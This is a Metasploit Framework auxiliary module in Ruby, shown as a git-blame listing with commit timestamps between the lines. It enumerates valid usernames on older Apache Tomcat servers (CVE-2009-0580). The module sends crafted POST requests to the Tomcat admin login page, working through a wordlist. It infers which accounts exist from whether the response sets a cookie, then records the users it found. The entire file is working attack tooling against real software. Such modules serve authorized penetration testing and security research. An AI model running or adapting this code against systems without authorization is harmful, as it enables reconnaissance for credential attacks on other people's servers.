2010-06-09 21:15:49 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-06-09 21:15:49 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::AuthBrute
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Apache Tomcat User Enumeration',
|
2010-07-07 19:52:05 +00:00
|
|
|
'Description' => %q{
|
2010-07-08 23:34:50 +00:00
|
|
|
Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version
|
2010-07-07 19:52:05 +00:00
|
|
|
6.0.20, 5.5.28, and 4.1.40.
|
|
|
|
},
|
2010-06-09 21:15:49 +00:00
|
|
|
'Author' =>
|
2010-07-07 19:52:05 +00:00
|
|
|
[
|
|
|
|
'Alligator Security Team',
|
|
|
|
'Heyder Andrade <heyder.andrade[at]gmail.com>',
|
|
|
|
'Leandro Oliveira <leandrofernando[at]gmail.com>'
|
|
|
|
],
|
2010-06-10 20:31:21 +00:00
|
|
|
'References' =>
|
2010-06-09 21:15:49 +00:00
|
|
|
[
|
|
|
|
['BID', '35196'],
|
2010-06-13 16:01:01 +00:00
|
|
|
['CVE', '2009-0580'],
|
2010-06-09 21:25:04 +00:00
|
|
|
['OSVDB', '55055'],
|
2010-06-10 20:31:21 +00:00
|
|
|
],
|
2010-07-07 19:52:05 +00:00
|
|
|
'License' => MSF_LICENSE
|
2010-06-10 20:31:21 +00:00
|
|
|
)
|
2010-06-09 21:15:49 +00:00
|
|
|
|
|
|
|
register_options(
|
2010-07-08 23:34:50 +00:00
|
|
|
[
|
2010-07-07 19:52:05 +00:00
|
|
|
Opt::RPORT(8080),
|
2010-06-09 21:15:49 +00:00
|
|
|
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
|
|
|
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
2012-01-29 00:13:34 +00:00
|
|
|
File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]),
|
2010-06-09 21:15:49 +00:00
|
|
|
], self.class)
|
|
|
|
|
2013-03-25 16:35:52 +00:00
|
|
|
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
|
2010-06-10 20:31:21 +00:00
|
|
|
end
|
2010-06-09 21:15:49 +00:00
|
|
|
|
|
|
|
def target_url
|
2012-11-08 16:42:48 +00:00
|
|
|
uri = normalize_uri(datastore['URI'])
|
|
|
|
"http://#{vhost}:#{rport}#{uri}"
|
2010-06-09 21:15:49 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
@users_found = {}
|
2013-03-25 16:35:52 +00:00
|
|
|
results = ""
|
2010-06-09 21:15:49 +00:00
|
|
|
|
2010-07-07 19:52:05 +00:00
|
|
|
each_user_pass { |user,pass|
|
2013-03-25 16:35:52 +00:00
|
|
|
results = do_login(user)
|
|
|
|
if results == "NetworkError"
|
|
|
|
break
|
|
|
|
end
|
2010-06-10 20:31:21 +00:00
|
|
|
}
|
2010-06-09 21:15:49 +00:00
|
|
|
|
2013-03-25 16:35:52 +00:00
|
|
|
if results == "NetworkError"
|
|
|
|
print_error("#{target_url} - UNREACHABLE")
|
|
|
|
elsif(@users_found.empty?)
|
2010-06-09 21:15:49 +00:00
|
|
|
print_status("#{target_url} - No users found.")
|
|
|
|
else
|
|
|
|
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:port => rport,
|
|
|
|
:type => 'tomcat.users',
|
|
|
|
:data => {:users => @users_found.keys.join(", ")}
|
|
|
|
)
|
2010-06-10 20:31:21 +00:00
|
|
|
end
|
|
|
|
end
|
2010-06-09 21:15:49 +00:00
|
|
|
|
|
|
|
def do_login(user)
|
|
|
|
post_data = "j_username=#{user}&password=%"
|
|
|
|
vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
|
|
|
|
begin
|
2010-07-07 19:52:05 +00:00
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'method' => 'POST',
|
2012-11-08 16:42:48 +00:00
|
|
|
'uri' => normalize_uri(datastore['URI']),
|
2010-07-07 19:52:05 +00:00
|
|
|
'data' => post_data,
|
|
|
|
}, 20)
|
|
|
|
|
|
|
|
if res
|
|
|
|
if res.code == 200
|
|
|
|
if res.headers['Set-Cookie']
|
|
|
|
vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
|
|
|
|
else
|
|
|
|
print_good("#{target_url} - Apache Tomcat #{user} found ")
|
|
|
|
@users_found[user] = :reported
|
|
|
|
end
|
|
|
|
end
|
2010-06-09 21:15:49 +00:00
|
|
|
else
|
|
|
|
print_error("#{target_url} - NOT VULNERABLE")
|
|
|
|
return :abort
|
|
|
|
end
|
2010-07-07 19:52:05 +00:00
|
|
|
|
2010-06-09 21:15:49 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
2013-03-25 16:35:52 +00:00
|
|
|
return "NetworkError"
|
2010-06-09 21:15:49 +00:00
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
2013-03-25 16:35:52 +00:00
|
|
|
return "NetworkError"
|
2010-06-09 21:15:49 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|